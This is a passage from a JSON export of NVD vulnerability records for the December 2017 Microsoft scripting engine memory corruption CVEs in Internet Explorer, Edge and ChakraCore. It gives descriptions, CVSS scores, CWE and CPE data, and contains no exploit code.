"cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2017-12-22T14:37:00", "cpe": ["cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:10", "cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11894", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11894", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:24", "description": "ChakraCore and Microsoft Edge in Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11893", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2019-04-25T18:55:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11893", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11893", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:26", "description": "ChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 R2, and Internet Explorer and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11895", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2017-12-22T14:17:00", "cpe": ["cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11895", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11895", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:34", "description": "Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how Internet Explorer handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11903", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2019-04-25T19:09:00", "cpe": ["cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:10"], "id": "CVE-2017-11903", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11903", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:32", "description": "Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how Internet Explorer handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11901", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2017-12-22T14:26:00", "cpe": ["cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:internet_explorer:10"], "id": "CVE-2017-11901", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11901", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:36", "description": "ChakraCore and Microsoft Edge in Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11905", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2017-12-22T14:27:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11905", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11905", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:40", "description": "Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how Internet Explorer handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11907", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2019-04-25T19:13:00", "cpe": ["cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:10"], "id": "CVE-2017-11907", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11907", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:44", "description": "ChakraCore and Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11909", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2019-04-25T19:06:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11909", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11909", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:49", "description": "ChakraCore and Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11910", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2017-12-21T19:54:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11910", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11910", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:51", "description": "ChakraCore and Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11911", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2019-04-25T19:05:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11911", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11911", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:56", "description": "Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how Internet Explorer handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11913", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2017-12-21T21:10:00", "cpe": ["cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:10"], "id": "CVE-2017-11913", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11913", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*"]}, {"lastseen": 